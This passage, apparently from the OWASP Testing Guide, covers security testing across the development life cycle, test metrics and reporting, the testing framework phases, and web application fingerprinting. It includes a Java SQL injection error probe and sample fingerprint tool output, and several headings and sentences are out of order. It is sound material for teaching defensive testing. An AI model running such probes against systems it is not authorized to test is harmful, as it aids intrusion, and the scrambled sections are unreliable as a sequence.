Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer's security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control; for example, software artifacts cannot be checked into the build with high or medium severity coding issues.
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to verify security test requirements.

Functional Testers' Security Tests
Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests
The main objective of integrated system tests is to validate the "defense in depth" concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing.
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective of testing the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.
Including security testing in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Application security testing requires a specialized set of skills, including both software and security knowledge, that are not typical of security engineers. As a result organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer's security testing knowledge. A so called "security test cases cheat list or check-list", for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET).
A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back to the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited.
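To make the manual probe just described concrete, the rough Java sketch below sends a classic single-quote attack vector and looks for database error signatures in the response. The target URL and parameter name are hypothetical (a test application one is authorized to test), and the error-string list is illustrative, not exhaustive; this is a sketch of the idea, not a tool prescribed by the guide.

import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;

public class SqlErrorProbe {

    public static void main(String[] args) throws Exception {
        // Hypothetical target: an "id" parameter on an application we are authorized to test.
        String payload = URLEncoder.encode("1'", StandardCharsets.UTF_8);
        URI target = URI.create("http://testapp.example/item?id=" + payload);

        HttpResponse<String> response = HttpClient.newHttpClient().send(
                HttpRequest.newBuilder(target).GET().build(),
                HttpResponse.BodyHandlers.ofString());

        // A SQL exception echoed back to the user is the first evidence worth investigating further.
        String body = response.body().toLowerCase();
        boolean suspicious = body.contains("sql syntax")
                || body.contains("sqlexception")
                || body.contains("odbc")
                || body.contains("ora-");
        System.out.println(suspicious
                ? "Possible SQL injection: database error message in response"
                : "No obvious database error message");
    }
}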
A more in-depth security test might require the tester's knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance test environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, a valid SSL certificate, and a secure configuration, with essential services disabled and the web root directory cleaned of test and administration web pages.

Security Test Data Analysis and Reporting
Goals for Security Test Metrics and Measurements
Defining the goals for the security testing metrics and measurements is a prerequisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production.
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., a smaller number of vulnerabilities) when compared with the baseline.
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bugs). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and the cost to implement the fix.
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. A measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors and by validating the vulnerability with penetration tests. The risk metrics associated with vulnerabilities found with security tests empower business management to make risk management decisions, such as to decide whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical risks).
When evaluating the security posture of an application it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application during testing. One measure of application size is the number of lines of code (LOC) of the application. Typically, software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test alone, it is logical for larger size applications to be tested more often than smaller size applications.
When security testing is done in several phases of the SDLC, the test data can prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced. The test data can also prove the effectiveness of removing the vulnerabilities by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as "containment metrics" and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing the vulnerabilities. It is less expensive to deal with vulnerabilities in the same phase of the SDLC in which they are found, rather than fixing them later in another phase.
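As a rough numeric illustration of these ideas, the sketch below computes a defect density per thousand lines of code and a simple phase containment ratio. The formulas are common industry conventions assumed for the example, not definitions taken from this guide, and the sample numbers are made up.

public class SecurityTestMetrics {

    // Issues (defects or vulnerabilities) per thousand lines of new and changed code.
    static double densityPerKloc(int issuesFound, int linesOfCode) {
        return issuesFound / (linesOfCode / 1000.0);
    }

    // Share of the issues introduced in a phase that were also found in that same phase.
    // A higher ratio means cheaper fixes, since fewer issues leak into later phases.
    static double phaseContainment(int foundInPhase, int introducedInPhase) {
        return introducedInPhase == 0 ? 1.0 : (double) foundInPhase / introducedInPhase;
    }

    public static void main(String[] args) {
        // Example: 50,000 lines of new code, 40 security issues found during coding
        // out of an estimated 50 introduced in that phase.
        System.out.printf("Density: %.2f issues/KLOC%n", densityPerKloc(40, 50_000));
        System.out.printf("Coding-phase containment: %.0f%%%n", 100 * phaseContainment(40, 50));
    }
}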
Security test metrics can support security risk, cost, and defect management analysis when they are associated with tangible and timed goals such as: • Reducing the overall number of vulnerabilities by 30% • Fixing security issues by a certain deadline (e.g., before beta release) Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews compared to penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. Security test data can also support specific objectives of the security analysis. These objects could be compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security cost benefit analysis. When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well the effectiveness of the process. Some examples of clues supported by security test data can be: • Are vulnerabilities reduced to an acceptable level for release? • How does the security quality of this product compare with similar software products? • Are all security test requirements being met? • What are the major root causes of security issues? • How numerous are security flaws compared to security bugs? • Which security activity is most effective in finding vulnerabilities? • Which team is more productive in fixing security defects and vulnerabilities? • Which percentage of overall vulnerabilities are high risk? • Which tools are most effective in detecting security vulnerabilities? • Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box) tests? • How many security issues are found during secure code reviews? • How many security issues are found during secure design reviews? In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools to use. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts. The issue is that the unknown security issues are not tested. The fact that a security test is clear of issues does not mean that the software or application is good. Some studies [22] have demonstrated that, at best, tools can only find 45% of overall vulnerabilities. Even the most sophisticated automation tools are not a match for an experienced security tester. Just relying on successful test results from automation tools will give security practitioners a false sense of security.Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training. 
Reporting Requirements
The security posture of an application can be characterized from the perspective of the effect, such as the number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause or origin, such as coding errors, architectural flaws, and configuration issues.
Vulnerabilities can be classified according to different criteria. The most commonly used vulnerability severity metric is the Forum of Incident Response and Security Teams (FIRST) Common Vulnerability Scoring System (CVSS), which is currently in release version 2 with version 3 due for release shortly.
When reporting security test data the best practice is to include the following information:
• The categorization of each vulnerability by type
• The security threat that the issue is exposed to
• The root cause of security issues (e.g., security bugs, security flaws)
• The testing technique used to find the issue
• The remediation of the vulnerability (e.g., the countermeasure)
• The severity rating of the vulnerability (High, Medium, Low and/or CVSS score)
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. Reporting the root cause of the issue can help pinpoint what needs to be fixed. In the case of white box testing, for example, the software security root cause of the vulnerability will be the offending source code.
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and adequate references.
Finally, the severity rating contributes to the calculation of risk rating and helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves external risk analysis based upon factors such as impact and exposure.
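As one way to make these reporting fields concrete, the sketch below is an illustrative data holder whose fields mirror the attributes listed above; it is not a report format prescribed by the guide, and CVSS scoring itself is out of scope here.

// Illustrative container for a single reported finding.
public class SecurityFinding {

    enum Severity { HIGH, MEDIUM, LOW }
    enum RootCause { SECURITY_BUG, SECURITY_FLAW, CONFIGURATION_ISSUE }

    final String vulnerabilityType;   // e.g., "SQL Injection"
    final String threat;              // e.g., "Information disclosure"
    final RootCause rootCause;        // design flaw, coding bug, or configuration issue
    final String testingTechnique;    // e.g., "Source code analysis"
    final String remediation;         // e.g., "Use parameterized queries"
    final Severity severity;
    final double cvssScore;

    SecurityFinding(String vulnerabilityType, String threat, RootCause rootCause,
                    String testingTechnique, String remediation,
                    Severity severity, double cvssScore) {
        this.vulnerabilityType = vulnerabilityType;
        this.threat = threat;
        this.rootCause = rootCause;
        this.testingTechnique = testingTechnique;
        this.remediation = remediation;
        this.severity = severity;
        this.cvssScore = cvssScore;
    }
}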
Business Cases
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders. The stakeholders can include project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility.
Software developers look at security test data to show that software is coded more securely and efficiently. This allows them to make the case for using source code analysis tools as well as following secure coding standards and attending software security training.
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests.
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production.
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization.
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), who are responsible for the budget that needs to be allocated in security resources, look for derivation of a cost benefit analysis from security test data. This allows them to make informed decisions on which security activities and tools to invest in. One of the metrics that supports such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted.

References
[1] T. DeMarco, Controlling Software Projects: Management, Measurement and Estimation, Yourdon Press, 1982
[2] S. Payne, A Guide to Security Metrics - http://www.sans.org/reading_room/whitepapers/auditing/55.php
[3] NIST, The economic impacts of inadequate infrastructure for software testing - http://www.nist.gov/director/planning/upload/report02-3.pdf
[4] Ross Anderson, Economics and Security Resource Page - http://www.cl.cam.ac.uk/~rja14/econsec.html
[5] Denis Verdon, Teaching Developers To Fish - OWASP AppSec NYC 2004
[6] Bruce Schneier, Cryptogram Issue #9 - https://www.schneier.com/crypto-gram-0009.html
[7] Symantec, Threat Reports - http://www.symantec.com/security_response/publications/threatreport.jsp
[8] FTC, The Gramm-Leach-Bliley Act - http://business.ftc.gov/privacy-and-security/gramm-leach-bliley-act
[9] Senator Peace and Assembly Member Simitian, SB 1386 - http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html
[10] European Union, Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data - http://ec.europa.eu/justice/policies/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf
[11] NIST, Risk management guide for information technology systems - http://csrc.nist.gov/publications/nistpubs/800-30-rev1/sp800_30_r1.pdf
[12] SEI, Carnegie Mellon, Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) - http://www.cert.org/octave/
[13] Ken Thompson, Reflections on Trusting Trust, reprinted from Communications of the ACM - http://cm.bell-labs.com/who/ken/trust.html
[14] Gary McGraw, Beyond the Badness-ometer - http://www.drdobbs.com/security/beyond-the-badness-ometer/189500001
[15] FFIEC, Authentication in an Internet Banking Environment - http://www.ffiec.gov/pdf/authentication_guidance.pdf
[16] PCI Security Standards Council, PCI Data Security Standard - https://www.pcisecuritystandards.org/security_standards/index.php
[17] MSDN, Cheat Sheet: Web Application Security Frame - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe
[18] MSDN, Improving Web Application Security, Chapter 2, Threats And Countermeasures - http://msdn.microsoft.com/en-us/library/aa302418.aspx
[19] Sindre, G., Opdahl, A., Capturing Security Requirements Through Misuse Cases - http://folk.uio.no/nik/2001/21-sindre.pdf
[20] Improving Security Across the Software Development Lifecycle Task Force, referred data from Capers Jones, Software Assessments, Benchmarks and Best Practices - http://www.criminal-justice-careers.com/resources/SDLCFULL.pdf
[21] MITRE, Being Explicit About Weaknesses, Slide 30, Coverage of CWE - http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt
[22] Marco Morana, Building Security Into The Software Life Cycle, A Business Case - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf

3 The OWASP Testing Framework

Overview
This section describes a typical testing framework that can be developed within an organization. It can be seen as a reference framework that comprises techniques and tasks that are appropriate at various phases of the software development life cycle (SDLC). Companies and project teams can use this model to develop their own testing framework and to scope testing services from vendors. This framework should not be seen as prescriptive, but as a flexible approach that can be extended and molded to fit an organization's development process and culture.
This section aims to help organizations build a complete strategic testing process, and is not aimed at consultants or contractors who tend to be engaged in more tactical, specific areas of testing.
It is critical to understand why building an end-to-end testing framework is crucial to assessing and improving software security. In Writing Secure Code, Howard and LeBlanc note that issuing a security bulletin costs Microsoft at least $100,000, and it costs their customers collectively far more than that to implement the security patches. They also note that the US government's CyberCrime web site (http://www.justice.gov/criminal/cybercrime/) details recent criminal cases and the loss to organizations. Typical losses far exceed USD $100,000.
With economics like this, it is little wonder why software vendors move from solely performing black box security testing, which can only be performed on applications that have already been developed, to concentrate on testing in the early cycles of application development such as definition, design, and development. Many security practitioners still see security testing in the realm of penetration testing. As discussed before, while penetration testing has a role to play, it is generally inefficient at finding bugs and relies excessively on the skill of the tester. It should only be considered as an implementation technique, or to raise awareness of production issues. To improve the security of applications, the security quality of the software must be improved. That means testing the security at the definition, design, develop, deploy, and maintenance stages, and not relying on the costly strategy of waiting until code is completely built. As discussed in the introduction of this document, there are many development methodologies such as the Rational Unified Process, eXtreme and Agile development, and traditional waterfall methodologies. The intent of this guide is to suggest neither a particular development methodology nor provide specific guidance that adheres to any particular methodology. Instead, we are presenting a generic development model, and the reader should follow it according to their company process. This testing framework consists of the following activities that should take place: • Before development begins • During definition and design • During development • During deployment • Maintenance and operations Phase 1: Before Development Begins Phase 1.1: Define a SDLC Before application development starts an adequate SDLC must be defined where security is inherent at each stage. Phase 1.2: Review Policies and Standards Ensure that there are appropriate policies, standards, and documentation in place. Documentation is extremely important as it gives development teams guidelines and policies that they can follow. People can only do the right thing if they know what the right thing is. If the application is to be developed in Java, it is essential that there is a Java secure coding standard. If the application is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every situation that the development team will face. By documenting the common and predictable issues, there will be fewer decisions that need to be made during the development process. Phase 1.3: Develop Measurement and Metrics Criteria and Ensure Traceability Before development begins, plan the measurement program. By defining criteria that need to be measured, it provides visibility into defects in both the process and product. It is essential to define the metrics before development begins, as there may be a need to modify the process in order to capture the data. Phase 2: During Definition and Design Phase 2.1: Review Security Requirements Security requirements define how an application works from a security perspective. It is essential that the security requirements are tested. Testing in this case means testing the assumptions that are made in the requirements and testing to see if there are gaps in the requirements definitions. 
For example, if there is a security requirement that states that users must be registered before they can get access to the whitepapers 25 The OWASP Testing Framework section of a website, does this mean that the user must be registered with the system or should the user be authenticated? Ensure that requirements are as unambiguous as possible. When looking for requirements gaps, consider looking at security mechanisms such as: • User Management • Authentication • Authorization • Data Confidentiality • Integrity • Accountability • Session Management • Transport Security • Tiered System Segregation • Legislative and standards compliance (including Privacy, Government and Industry standards) Phase 2.2: Review Design and Architecture Applications should have a documented design and architecture. This documentation can include models, textual documents, and other similar artifacts. It is essential to test these artifacts to ensure that the design and architecture enforce the appropriate level of security as defined in the requirements. Identifying security flaws in the design phase is not only one of the most cost-efficient places to identify flaws, but can be one of the most effective places to make changes. For example, if it is identified that the design calls for authorization decisions to be made in multiple places, it may be appropriate to consider a central authorization component. If the application is performing data validation at multiple places, it may be appropriate to develop a central validation framework (ie, fixing input validation in one place, rather than in hundreds of places, is far cheaper). If weaknesses are discovered, they should be given to the system architect for alternative approaches. development. These are often smaller decisions that were either too detailed to be described in the design, or issues where no policy or standard guidance was offered. If the design and architecture were not adequate, the developer will be faced with many decisions. If there were insufficient policies and standards, the developer will be faced with even more decisions. Phase 3.1: Code Walk Through The security team should perform a code walk through with the developers, and in some cases, the system architects. A code walk through is a high-level walk through of the code where the developers can explain the logic and flow of the implemented code. It allows the code review team to obtain a general understanding of the code, and allows the developers to explain why certain things were developed the way they were. The purpose is not to perform a code review, but to understand at a high level the flow, the layout, and the structure of the code that makes up the application. Phase 3.2: Code Reviews Armed with a good understanding of how the code is structured and why certain things were coded the way they were, the tester can now examine the actual code for security defects. Static code reviews validate the code against a set of checklists, icluding: • Business requirements for availability, confidentiality, and integrity. • OWASP Guide or Top 10 Checklists for technical exposures (depending on the depth of the review). • Specific issues relating to the language or framework in use, such as the Scarlet paper for PHP or Microsoft Secure Coding checklists for ASP.NET. • Any industry specific requirements, such as Sarbanes-Oxley 404, COPPA, ISO/IEC 27002, APRA, HIPAA, Visa Merchant guidelines, or other regulatory regimes. 
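Parts of this checklist-driven review can be supported with lightweight tooling. The following Python sketch is only an illustration, not a replacement for a proper static analysis tool: it walks a source tree and flags a few checklist-style patterns. The directory name, file extensions, and patterns are assumptions chosen for the example.

import os
import re

# Illustrative, checklist-inspired patterns; extend per the language and framework in use.
CHECKS = {
    "possible hard-coded credential": re.compile(r"(password|passwd|secret)\s*=\s*['\"].+['\"]", re.I),
    "dynamic SQL concatenation": re.compile(r"(SELECT|INSERT|UPDATE|DELETE)\s.+['\"]\s*\+", re.I),
    "use of eval()": re.compile(r"\beval\s*\("),
}

def review(root, extensions=(".py", ".php", ".jsp", ".aspx")):
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as handle:
                for lineno, line in enumerate(handle, 1):
                    for label, pattern in CHECKS.items():
                        if pattern.search(line):
                            print(f"{path}:{lineno}: {label}: {line.strip()}")

if __name__ == "__main__":
    review("./src")   # assumed location of the source tree under review

Findings from such a script are only pointers for the human reviewer; every hit still needs to be validated against the checklists listed above.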
Phase 2.3: Create and Review UML Models Once the design and architecture is complete, build Unified Modeling Language (UML) models that describe how the application works. In some cases, these may already be available. Use these models to confirm with the systems designers an exact understanding of how the application works. If weaknesses are discovered, they should be given to the system architect for alternative approaches. In terms of return on resources invested (mostly time), static code reviews produce far higher quality returns than any other security review method and rely least on the skill of the reviewer. However, they are not a silver bullet and need to be considered carefully within a full-spectrum testing regime. Phase 2.4: Create and Review Threat Models Armed with design and architecture reviews and the UML models explaining exactly how the system works, undertake a threat modeling exercise. Develop realistic threat scenarios. Analyze the design and architecture to ensure that these threats have been mitigated, accepted by the business, or assigned to a third party, such as an insurance firm. When identified threats have no mitigation strategies, revisit the design and architecture with the systems architect to modify the design. Phase 4: During Deployment Phase 3: During Development Theoretically, development is the implementation of a design. However, in the real world, many design decisions are made during code For more details on OWASP checklists, please refer to OWASP Guide for Secure Web Applications, or the latest edition of the OWASP Top 10. Phase 4.1: Application Penetration Testing Having tested the requirements, analyzed the design, and performed code review, it might be assumed that all issues have been caught. Hopefully this is the case, but penetration testing the application after it has been deployed provides a last check to ensure that nothing has been missed. Phase 4.2: Configuration Management Testing The application penetration test should include the checking of how the infrastructure was deployed and secured. While the application may be secure, a small aspect of the configuration could still be at a default install stage and vulnerable to exploitation. 26 The OWASP Testing Framework Phase 5: Maintenance and Operations Phase 5.1: Conduct Operational Management Reviews There needs to be a process in place which details how the operational side of both the application and infrastructure is managed. Phase 5.2: Conduct Periodic Health Checks Monthly or quarterly health checks should be performed on both the application and infrastructure to ensure no new security risks have been introduced and that the level of security is still intact. Phase 5.3: Ensure Change Verification After every change has been approved and tested in the QA environment and deployed into the production environment, it is vital that the change is checked to ensure that the level of security has not been affected by the change. This should be integrated into the change management process. A Typical SDLC Testing Workflow The following figure shows a typical SDLC Testing Workflow. 
OWASP TESTING FRAMEWORK WORK FLOW (figure)
• Before Development: Review SDLC Process; Metrics Criteria (Measurement Traceability); Policy Review; Standards Review
• Definition and Design: Requirements Review; Design and Architecture Review; Create / Review UML Models; Create / Review Threat Models
• Development: Code Walkthroughs; Code Review; Unit and System Tests
• Deployment: Penetration Testing; Configuration Management Reviews; Unit and System Tests; Acceptance Tests
• Maintenance: Change Verification; Health Checks; Operational Management Reviews; Regression Tests

4 Web Application Security Testing

The following sections describe the 12 subcategories of the Web Application Penetration Testing Methodology:

Testing: Introduction and objectives
This section describes the OWASP web application security testing methodology and explains how to test for evidence of vulnerabilities within the application due to deficiencies with identified security controls.

What is Web Application Security Testing?
A security test is a method of evaluating the security of a computer system or network by methodically validating and verifying the effectiveness of application security controls. A web application security test focuses only on evaluating the security of a web application. The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation, or a technical solution.

What is a Vulnerability?
A vulnerability is a flaw or weakness in a system’s design, implementation, operation or management that could be exploited to compromise the system’s security objectives.

What is a Threat?
A threat is anything (a malicious external attacker, an internal user, a system instability, etc.) that may harm the assets owned by an application (resources of value, such as the data in a database or in the file system) by exploiting a vulnerability.

What is a Test?
A test is an action to demonstrate that an application meets the security requirements of its stakeholders.

The Approach in Writing this Guide
The OWASP approach is open and collaborative:
• Open: every security expert can participate with his or her experience in the project. Everything is free.
• Collaborative: brainstorming is performed before the articles are written so the team can share ideas and develop a collective vision of the project. That means rough consensus, a wider audience and increased participation.
This approach tends to create a defined Testing Methodology that will be:
• Consistent
• Reproducible
• Rigorous
• Under quality control
The problems to be addressed are fully documented and tested. It is important to use a method to test all known vulnerabilities and document all the security test activities.

What is the OWASP testing methodology?
Security testing will never be an exact science where a complete list of all possible issues that should be tested can be defined. Indeed, security testing is only an appropriate technique for testing the security of web applications under certain circumstances. The goal of this project is to collect all the possible testing techniques, explain these techniques, and keep the guide updated. The OWASP Web Application Security Testing method is based on the black box approach. The tester knows nothing or has very little information about the application to be tested.
The testing model consists of: • Tester: Who performs the testing activities • Tools and methodology: The core of this Testing Guide project • Application: The black box to test The test is divided into 2 phases: • Phase 1 Passive mode: In the passive mode the tester tries to understand the application’s logic and plays with the application. Tools can be used for information gathering. For example, an HTTP proxy can be used to observe all the HTTP requests and responses. At the end of this phase, the tester should understand all the access points (gates) of the application (e.g., HTTP headers, parameters, and cookies). The Information Gathering section explains how to perform a passive mode test. For example the tester could find the following: https://www.example.com/login/Authentic_Form.html This may indicate an authentication form where the application requests a username and a password. The following parameters represent two access points (gates) to the application: http://www.example.com/Appx.jsp?a=1&b=1 In this case, the application shows two gates (parameters a and b). All the gates found in this phase represent a point of testing. A spreadsheet with the directory tree of the application and all the access points would be useful for the second phase. 28 Web Application Penetration Testing • Phase 2 Active mode: In this phase the tester begins to test using the methodology described in the follow sections. The set of active tests have been split into 11 sub-categories for a total of 91 controls: • Information Gathering • Configuration and Deployment Management Testing • Identity Management Testing • Authentication Testing • Authorization Testing • Session Management Testing • Input Validation Testing • Error Handling • Cryptography • Business Logic Testing • Client Side Testing Testing for Information Gathering Understanding the deployed configuration of the server hosting the web application is almost as important as the application security testing itself. After all, an application chain is only as strong as its weakest link. Application platforms are wide and varied, but some key platform configuration errors can compromise the application in the same way an unsecured application can compromise the server. Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001) Summary There are direct and indirect elements to search engine discovery and reconnaissance. Direct methods relate to searching the indexes and the associated content from caches. Indirect methods relate to gleaning sensitive design and configuration information by searching forums, newsgroups, and tendering websites. Once a search engine robot has completed crawling, it commences indexing the web page based on tags and associated attributes, such asJoomla Drupal DotNetNuke DNN Platform - http://www.dnnsoftware.com Tools A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools. WhatWeb Website: http://www.morningstarsecurity.com/research/whatweb Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. Language: Ruby Matches for fingerprinting are made with: Tip: before starting dirbusting, it is recommended to check the robots.txt file first. Sometimes application specific folders and other sensitive information can be found there as well. An example of such a robots.txt file is presented on a screenshot below. 
• Text strings (case sensitive) • Regular expressions • Google Hack Database queries (limited set of keywords) • MD5 hashes • URL recognition • HTML tag patterns • Custom ruby code for passive and aggressive operations 46 Web Application Penetration Testing Sample output is presented on a screenshot below: Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to construct a target website immediately after browsing a page. Sample output of a plug-in is presented on a screenshot below. BlindElephant Website: https://community.qualys.com/community/blindelephant This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python Sample output of a successful fingerprint: pentester$ python BlindElephant.py http://my_target drupal Loaded /Library/Python/2.7/site-packages/blindelephant/ dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups. Starting BlindElephant fingerprint for version of drupal at http:// my_target References Whitepapers Hit http://my_target/CHANGELOG.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 527b085a3717bd691d47713dff74acf4 Remediation The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be detected by automatic scans. Below are some specific recommendations by framework marker location and some additional interesting approaches. Hit http://my_target/INSTALL.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4 Hit http://my_target/misc/drupal.js Possible versions based on result: 7.12, 7.13, 7.14 Hit http://my_target/MAINTAINERS.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca Hit http://my_target/themes/garland/style.css Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14 ... Fingerprinting resulted in: 7.14 • Saumil Shah: “An Introduction to HTTP fingerprinting” - http://www. net-square.com/httprint_paper.html • Anant Shrivastava : “Web Application Finger Printing” - http://anantshri.info/articles/web_app_finger_printing.html HTTP headers Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used. Here is an interesting article about HTTP-headers obfuscation using Netscaler: http:// grahamhosking.blogspot.ru/2013/07/obfuscating-http-header-using-netscaler.html Cookies It is recommended to change cookie names by making changes in the corresponding configuration files. HTML source code Manually check the contents of the HTML code and remove everything that explicitly points to the framework. 
